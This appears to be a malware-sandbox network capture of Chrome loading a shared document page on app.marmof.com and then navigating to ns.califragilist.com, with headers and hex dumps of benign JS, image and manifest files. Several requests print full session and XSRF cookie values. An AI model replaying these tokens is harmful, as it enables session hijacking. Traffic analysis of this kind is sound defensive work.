                                                                                                                                              2024-11-06 15:55:26 UTC1344OUTGET /favicon-32x32.png HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:26 UTC322INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:26 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 1455
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:28:57 GMT
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66758e29-5af"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:26 UTC1455INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 03 00 00 00 44 a4 8a c6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 02 10 50 4c 54 45 00 00 00 14 1a 26 11 19 26 13 18 27 11 18 27 12 18 28 0e 17 26 11 19 27 0b 18 2d 11 17 27 14 18 27 12 1a 28 ff 5d 1c ff ff 00 ff 92 11 ff 65 19 f4 4b 1e f3 4c 1e f3 4b 1e f3 4d 1f f3 4b 1f f3 4d 20 f3 4a 1e f5 4b 1c ec 4d 26 11 18 27 11 18 27 11 19 27 12 19 26 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 12 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11
                                                                                                                                              Data Ascii: PNGIHDR DgAMAa cHRMz&u0`:pQ<PLTE&&''(&'-''(]eKLKMKM JKM&'''&''''''''''''''''''''''


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              18192.168.2.1849763159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:26 UTC1093OUTGET /build/assets/Document-d618b903.js HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:26 UTC373INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:26 GMT
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Content-Length: 2155
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:30:40 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66758e90-86b"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:26 UTC2155INData Raw: 69 6d 70 6f 72 74 7b 70 20 61 73 20 6d 2c 6f 20 61 73 20 75 2c 64 20 61 73 20 78 2c 62 20 61 73 20 61 2c 75 20 61 73 20 74 2c 61 20 61 73 20 65 2c 77 20 61 73 20 72 2c 6e 20 61 73 20 6c 2c 74 20 61 73 20 6e 2c 46 20 61 73 20 68 2c 71 20 61 73 20 66 2c 5a 20 61 73 20 5f 2c 7a 20 61 73 20 69 2c 66 20 61 73 20 64 7d 66 72 6f 6d 22 2e 2f 61 70 70 2d 34 39 32 36 35 61 64 31 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4c 20 61 73 20 70 7d 66 72 6f 6d 22 2e 2f 6c 6f 67 6f 74 79 70 65 2d 6f 72 69 67 69 6e 61 6c 2d 36 66 33 65 61 63 34 38 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 5f 20 61 73 20 67 7d 66 72 6f 6d 22 2e 2f 42 75 74 74 6f 6e 2d 37 63 30 34 37 35 61 39 2e 6a 73 22 3b 63 6f 6e 73 74 20 62 3d 7b 63 6c 61 73 73 3a 22 62 6f 72 64 65 72 2d 62 20 62 67 2d 67 72 61 79 2d
                                                                                                                                              Data Ascii: import{p as m,o as u,d as x,b as a,u as t,a as e,w as r,n as l,t as n,F as h,q as f,Z as _,z as i,f as d}from"./app-49265ad1.js";import{L as p}from"./logotype-original-6f3eac48.js";import{_ as g}from"./Button-7c0475a9.js";const b={class:"border-b bg-gray-


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              19192.168.2.1849764159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:26 UTC1102OUTGET /build/assets/logotype-original-6f3eac48.js HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:26 UTC374INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:26 GMT
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Content-Length: 6332
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:30:40 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66758e90-18bc"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:26 UTC6332INData Raw: 69 6d 70 6f 72 74 7b 6f 20 61 73 20 43 2c 64 20 61 73 20 74 2c 61 63 20 61 73 20 56 7d 66 72 6f 6d 22 2e 2f 61 70 70 2d 34 39 32 36 35 61 64 31 2e 6a 73 22 3b 63 6f 6e 73 74 20 61 3d 7b 76 69 65 77 42 6f 78 3a 22 30 20 30 20 31 30 33 35 20 32 30 39 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 7d 2c 6f 3d 56 28 27 3c 70 61 74 68 20 64 3d 22 4d 33 36 31 2e 36 34 35 20 36 37 2e 36 31 30 32 43 33 35 30 2e 36 39 36 20 35 37 2e 32 38 36 34 20 33 33 35 2e 33 32 38 20 35 32 2e 31 32 34 35 20 33 31 35 2e 36 31 38 20 35 32 2e 31 32 34 35 43 33 30 33 2e 36 31 33 20 35 32 2e 31 32 34 35 20 32 39 32 2e 39 37 37 20 35 34 2e 34 37 30 38 20 32 38 33 2e 36 36 39 20 35 39 2e
                                                                                                                                              Data Ascii: import{o as C,d as t,ac as V}from"./app-49265ad1.js";const a={viewBox:"0 0 1035 209",fill:"none",xmlns:"http://www.w3.org/2000/svg"},o=V('<path d="M361.645 67.6102C350.696 57.2864 335.328 52.1245 315.618 52.1245C303.613 52.1245 292.977 54.4708 283.669 59.


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              20192.168.2.1849765159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:26 UTC560OUTGET /site.webmanifest HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: manifest
                                                                                                                                              Referer: https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:26 UTC336INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:26 GMT
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Content-Length: 291
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:28:57 GMT
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66758e29-123"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:26 UTC291INData Raw: 7b 0a 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 22 2c 0a 20 20 20 20 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 20 22 22 2c 0a 20 20 20 20 22 69 63 6f 6e 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 22 3a 20 22 2f 61 6e 64 72 6f 69 64 2d 63 68 72 6f 6d 65 2d 31 39 32 78 31 39 32 2e 70 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 31 39 32 78 31 39 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 5d 2c 0a 20 20 20 20 22 74 68 65 6d 65 5f 63 6f 6c 6f 72 22 3a 20 22 23 66 66 66 66 66 66 22 2c 0a 20 20 20 20 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 20 22 23 66 66 66
                                                                                                                                              Data Ascii: { "name": "", "short_name": "", "icons": [ { "src": "/android-chrome-192x192.png", "sizes": "192x192", "type": "image/png" } ], "theme_color": "#ffffff", "background_color": "#fff


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              21192.168.2.1849766159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:26 UTC1091OUTGET /build/assets/Button-7c0475a9.js HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:26 UTC373INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:26 GMT
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Content-Length: 3018
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:30:40 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66758e90-bca"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:26 UTC3018INData Raw: 69 6d 70 6f 72 74 7b 6f 20 61 73 20 64 2c 64 20 61 73 20 61 2c 65 20 61 73 20 63 2c 6c 2c 6e 20 61 73 20 69 7d 66 72 6f 6d 22 2e 2f 61 70 70 2d 34 39 32 36 35 61 64 31 2e 6a 73 22 3b 63 6f 6e 73 74 20 75 3d 5b 22 74 79 70 65 22 2c 22 64 69 73 61 62 6c 65 64 22 5d 2c 79 3d 7b 6b 65 79 3a 30 2c 63 6c 61 73 73 3a 22 69 2d 65 6f 73 2d 69 63 6f 6e 73 3a 62 75 62 62 6c 65 2d 6c 6f 61 64 69 6e 67 20 62 6c 6f 63 6b 20 68 2d 33 20 77 2d 33 22 7d 2c 68 3d 7b 5f 5f 6e 61 6d 65 3a 22 42 75 74 74 6f 6e 22 2c 70 72 6f 70 73 3a 7b 63 6f 6c 6f 72 3a 7b 74 79 70 65 3a 53 74 72 69 6e 67 2c 64 65 66 61 75 6c 74 3a 22 70 72 69 6d 61 72 79 22 7d 2c 73 69 7a 65 3a 7b 74 79 70 65 3a 53 74 72 69 6e 67 2c 64 65 66 61 75 6c 74 3a 22 6d 64 22 7d 2c 72 6f 75 6e 64 65 64 3a 7b 74 79
                                                                                                                                              Data Ascii: import{o as d,d as a,e as c,l,n as i}from"./app-49265ad1.js";const u=["type","disabled"],y={key:0,class:"i-eos-icons:bubble-loading block h-3 w-3"},h={__name:"Button",props:{color:{type:String,default:"primary"},size:{type:String,default:"md"},rounded:{ty


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              22192.168.2.1849769159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:27 UTC1077OUTGET /favicon-32x32.png HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:28 UTC322INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:27 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 1455
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:28:57 GMT
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66758e29-5af"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:28 UTC1455INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 03 00 00 00 44 a4 8a c6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 02 10 50 4c 54 45 00 00 00 14 1a 26 11 19 26 13 18 27 11 18 27 12 18 28 0e 17 26 11 19 27 0b 18 2d 11 17 27 14 18 27 12 1a 28 ff 5d 1c ff ff 00 ff 92 11 ff 65 19 f4 4b 1e f3 4c 1e f3 4b 1e f3 4d 1f f3 4b 1f f3 4d 20 f3 4a 1e f5 4b 1c ec 4d 26 11 18 27 11 18 27 11 19 27 12 19 26 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 12 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11 18 27 11
                                                                                                                                              Data Ascii: PNGIHDR DgAMAa cHRMz&u0`:pQ<PLTE&&''(&'-''(]eKLKMKM JKM&'''&''''''''''''''''''''''


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              23192.168.2.1849772188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:32 UTC674OUTGET /7PXU/ HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:33 UTC1220INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:33 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P9mRtQPUw%2BqL%2FaI5eL3argPVmERaP3gaMp8ZbbgfnT3TGz92Wy33J1nbQhwZ%2FPNHgjjqMtz5aJC33NwF99QRT4rA%2BKHhTQd3r3xDKCmwoaAKu%2FUhMAEkAF2fvZ5ZXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3273&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1589&delivery_rate=872026&cwnd=237&unsent_bytes=0&cid=51e9d1c3514e8346&ts=202&x=0"
                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IjhqSENYMSt1OXdLOXRZbGJzV1FqL3c9PSIsInZhbHVlIjoiaHk0N05sMlNZK1IySDVXRFdhVkZkRTczQjB6ZUU5bktEaE9mZDhNVHlNRlNMMk1ZdXgzOXZWOUQ1SU5OdW9xTlZ1ejA5bmhnMTlTVThINHp2b2xNL1ZIandRTFV1WEJWYkpEUndjOHQzcldKUXNLcGdPaDhxOUxrRVc3alRPcmQiLCJtYWMiOiI0YmQwNjlkNDY4OWI0MjIwYjVhMjI0Njc2MTZlNWE0NjkxZDExNTU0Mzk0ODc5MTlhZmNmNWQ5ZjAwY2Q5ZDBiIiwidGFnIjoiIn0%3D; expires=Wed, 06-Nov-2024 17:55:33 GMT; Max-Age=7200; path=/; secure; samesite=none
